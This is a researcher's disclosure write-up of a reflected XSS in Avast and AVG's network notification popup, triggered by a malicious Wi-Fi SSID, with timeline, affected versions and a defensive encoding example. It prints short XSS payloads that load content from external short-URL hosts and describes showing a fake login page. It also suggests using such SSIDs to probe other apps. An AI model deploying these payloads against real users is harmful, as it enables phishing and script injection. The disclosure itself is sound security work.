CVE-2019-18653 & CVE-2019-18654: The story of how a Reflected XSS was triggered from an SSID name (it also affected AVG AntiVirus, since the code of those products is mostly "merged").
In the name of Allah, the Most Gracious, the Most Merciful.
So, this article is written in two ways: one part tells the story of how I found the issue, and the other explains the basics and the references.
Readers can also jump straight to the TL;DR section.
1.1. Create an SSID name containing a short XSS payload (an SSID holds at most 32 characters, 32 octets per 802.11). The short XSS payloads published by Brute Logic and s0md3v fit (thanks, guys!).
1.2. Connect a Windows machine (with Avast AntiVirus installed and active) to that SSID and wait for Avast's Network Notification feature to trigger the XSS payload.
1.3. Reported to Avast and confirmed as a valid issue within about 2 days. A few months later, they judged the issue to be rather serious and decided to reward the report with $5,000.
II. Behind the Scenes: How I Found this Issue
So, a few years ago, I read a nice article by a bug hunter who found a lot of XSS issues at big-name companies by putting an XSS payload in his SSID name (I lost that bookmark, unfortunately). In short, while using many apps, he found many of them reflecting the value of his SSID name (and the XSS was triggered). From then on, I started using an XSS payload as my SSID name (on my OS X machine).
So, a few months ago, I got a notebook (running Windows) from the office I work for. I installed everything I needed over a tethered connection and left Avast AntiVirus for last (at home). At home, I finished the installation and everything went fine.
Until one day I used this notebook again for a training session. In the middle of the training (day 3 or day 4), I had a problem with the connection I was using. So the notebook suddenly connected to my tethering hotspot automatically (with Avast installed), and within a few seconds I got a popup alert from "https://local.avast.com" on my desktop.
To be honest, I had no idea how it could work like that. Luckily, the class was being recorded, and I asked for a copy of the session covering that period. Trying to figure out how the popup appeared, I finally got the answer the next day: the XSS was triggered because the embedded "Network Notification" feature (part of the Firewall) in Avast (specifically the Internet Security and Premier editions) reflected the SSID name without sanitizing it.
I wrote the report that night, and got a reply about 2 days later confirming that the issue was valid.
As quoted from Avast's official site, Avast, one of the largest security companies in the world, uses next-gen technologies to fight cyber-attacks in real time and is dedicated to creating a world that provides safety and privacy for all, no matter who you are, where you are, or how you connect.
Through its research, Avast aims to deliver the best endpoint protection for every user. One visible feature is the "Firewall", which can be used easily to manage inbound and outbound traffic.
By default, this Firewall feature shows an alert (popup notification) to the user when they connect to a new network. For example, in the picture below, the user has just connected to a wireless network with the SSID name "My Hotspot".
After the popup appears, the user can choose the type of network for the SSID they connected to, such as a "Private" network or a "Public" network.
The problem is that the notification popup did not filter (or encode) the special characters reflected from the SSID name. In other words, an attacker can trigger XSS on the client, via the notification popup, by using a malicious SSID name.
4.1. Cross Site Scripting (XSS)
To put it simply, this kind of vulnerability lets an attacker inject script into a page whose output does not encode special characters such as " > < : / ; etc. In contrast to Stored XSS, where the application saves the injected code, Reflected XSS does not persist the payload at all, so the target is expected to visit the URL (or, more generally, to be shown the content) that carries the attacker's injected input. In this case the "page" is Avast's web-based notification popup (served from local.avast.com) and the reflected input is the SSID name rather than a URL parameter, so the victim only has to connect to the attacker's network.
One good thing: even though the SSID name is limited to 32 characters (32 octets on the air), we can still work around the limit by having the payload load a short URL. Credits to Brute Logic and s0md3v, thanks guys!
4.1.1. The Short XSS Payload
When I first got the popup alert, I had no idea how to trigger it further. Then, Alhamdulillah, I was lucky to remember that I had read publications by "Brute Logic" and "s0md3v" about short XSS payloads. And the cool thing is, it works!
And yes (absolutely), there are many researchers out there sharing other great and creative payloads that you can follow.
4.2. Research Story: Things that Can Be Executed by Using a Malicious SSID Name
As explained previously, I learned this trick from a write-up published by a bug hunter (I'm really sorry, I lost that bookmark). Through it, I eventually found out that research in this area had already been conducted in great detail by Deral Heiland back in 2013. He published the research at BlackHat Europe 2013.
So, for deeper research and knowledge on this, you can refer to his presentation. Highly recommended.
4.3. Affected Version and Testing Environment
Avast: the vulnerability was found in Avast Internet Security version 19.3.2369 (build 19.3.4241.440). It also affects Avast Free Antivirus and the Premier edition.
And on the AVG side: the issue affects AVG Internet Security version 19.3.3084 (build 19.3.4241.440).
As a small note, both issues were reproduced on Windows 10 (fully patched as of March 22nd, 2019).
V. SUMMARY OF ISSUE
As described above, the security problem in this report is a vulnerability that allows an attacker to trigger XSS on the client, via the notification popup, by using a malicious SSID name.
In this situation, an attacker could also display a fake login page (for example with an Avast / AVG logo) via the notification popup, and the user would have no reason to be suspicious, since there is no URL bar to inspect when the script displays the fake login page inside the popup.
VI. PROOF OF CONCEPT
To complete the explanation, here are the steps to reproduce this issue:
6.2. Make sure the victim connects to the prepared SSID;
6.3. After the victim connects to the prepared SSID, wait a few seconds. The popup notification will be shown and the script will be triggered:
6.4. Since the SSID name is limited to 32 characters, we have to keep the script short by pointing it at a short URL service. For example, to trigger a login form from another portal, the script used is: ><embed src=//tiny.cc/XYZABCX> (bit.ly also works).
And the good thing is that you can also trigger the script from another external URL (credits to s0md3v). Here is an example: ><embed src=//14.rs>
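To make the two mechanics from sections 4.1, 4.1.1 and 6.4 concrete, here is an added JavaScript model. It is not Avast's or AVG's code and not the original PoC: it checks that a short-URL payload fits in the 32-octet SSID budget, and contrasts a hypothetical popup renderer that concatenates the SSID straight into HTML with one that HTML-encodes it. The popup markup, the function names and the over-long example.com path are assumptions for illustration; the two short payloads are the ones shown in 6.4. It runs under Node.js with no dependencies.

```javascript
// Added example (not Avast/AVG code, not the original PoC): models the reflected
// SSID bug from sections 4.1 and 6.4. Runs under Node.js with no dependencies.

// IEEE 802.11 caps an SSID at 32 octets. The limit is bytes, not characters,
// so a multibyte character eats more than one slot of the payload budget.
const SSID_MAX_OCTETS = 32;

function ssidOctetLength(ssid) {
  return new TextEncoder().encode(ssid).length;
}

// Builds the short payload shape used in section 6.4: ><embed src=//host/path>
// The leading ">" is there to break out of whatever tag the SSID lands in; the
// popup's real markup is not shown on the page, so this is an assumption.
function buildEmbedPayload(hostAndPath) {
  return `><embed src=//${hostAndPath}>`;
}

function fitsInSsid(payload) {
  return ssidOctetLength(payload) <= SSID_MAX_OCTETS;
}

// Hypothetical vulnerable renderer: the SSID is concatenated into HTML unencoded,
// which is the behaviour the write-up describes for the notification popup.
function renderNotificationVulnerable(ssid) {
  return `<div class="net-alert">Connected to new network "${ssid}"</div>`;
}

// Encode the five characters that can change meaning in HTML text or attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened renderer: same template, SSID encoded before it reaches the HTML.
function renderNotificationSafe(ssid) {
  return `<div class="net-alert">Connected to new network "${escapeHtml(ssid)}"</div>`;
}

// Crude detector for the demo: did an element tag we never wrote appear?
function containsInjectedTag(html) {
  return /<(embed|script|img|iframe|svg|object)\b/i.test(html);
}

// Constructed inputs: the two payloads from the write-up plus one that is too long.
function demo() {
  const candidates = [
    buildEmbedPayload('14.rs'),                        // 20 octets, fits
    buildEmbedPayload('tiny.cc/XYZABCX'),              // 30 octets, fits
    buildEmbedPayload('example.com/a/very/long/path'), // 43 octets, over the SSID limit
  ];
  return candidates.map((payload) => ({
    payload,
    octets: ssidOctetLength(payload),
    fits: fitsInSsid(payload),
    vulnerableRendererInjected: containsInjectedTag(renderNotificationVulnerable(payload)),
    safeRendererInjected: containsInjectedTag(renderNotificationSafe(payload)),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(demo());
}
```

Note that the hardened renderer encodes the SSID rather than "filtering" it: stripping a blocklist of characters, as section 4.1 frames the missing protection, is fragile because each injection context (text, attribute, script) needs a different list, whereas contextual output encoding keeps the SSID as data whatever it contains. The octet check is also the first thing to run when crafting a payload, since a non-ASCII character in the SSID silently costs more than one of the 32 slots.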
VII. ADDITIONAL INFORMATION
To complete the explanation, here is a simple PoC video showing how it works:
VIII. Reporting Timeline
Mar 21st, 2019: Found the issue, root cause unknown yet;
Mar 22nd, 2019: Found the root cause, then wrote and sent the report via firstname.lastname@example.org;
Mar 25th, 2019: Sent the information that AVG is affected too;
Mar 25th, 2019: Avast replied and confirmed the bug. They said they would release a fix soon;
Mar 25th, 2019: Avast replied that it was not surprising that AVG was affected by the same issue. They kindly gave a high-level explanation.
May 24th, 2019: Avast said the issue was fixed (in Avast 19.4) and already released. They also said they would give more details once the reward was decided.
June 12th, 2019: Avast judged this issue to be rather serious and decided to reward the report with $5,000. (Really amazing.)
This really broke my record for a single reward payment. The decision also really surprised me. At the time, I still didn't believe it until the money actually arrived in my PayPal account.
To Avast: thank you so much for the surprising reward and the amazing program! Really appreciated. I'm lost for words to thank them.
Oct 30th, 2019: CVE-2019-18653 was assigned to the Avast issue and CVE-2019-18654 to the AVG issue.
IX. The Closing
Well, as readers can see, this is something I never imagined (triggering XSS in a desktop app). A few simple notes that I can share (with my limited knowledge):
Always try to bookmark everything you read. Make a note and come back to it when you want to use those tricks on your target. In this case, I had read and saved the publications by Brute Logic and s0md3v some time ago. When I hit a hard situation (for example, triggering XSS with a limited number of characters), I went back to their write-ups and opened my notes.
Even though it looks silly, it is worth setting your SSID name to (for example) an XSS payload. I have had it set that way for a few years (since the first time I read the write-up published by that bug hunter, thanks man!), but only in 2019 did I see it triggered in a desktop app on Windows (it doesn't affect the OS X version of Avast, by the way).
Other vectors that I learned from this one are:
XSS via a malicious SSID name can also be triggered in any application that reflects or stores our SSID name. In this case, Avast and AVG reflected the SSID name.
Apart from desktop apps, please don't forget that XSS can also be triggered in web or mobile applications that reflect the SSID name.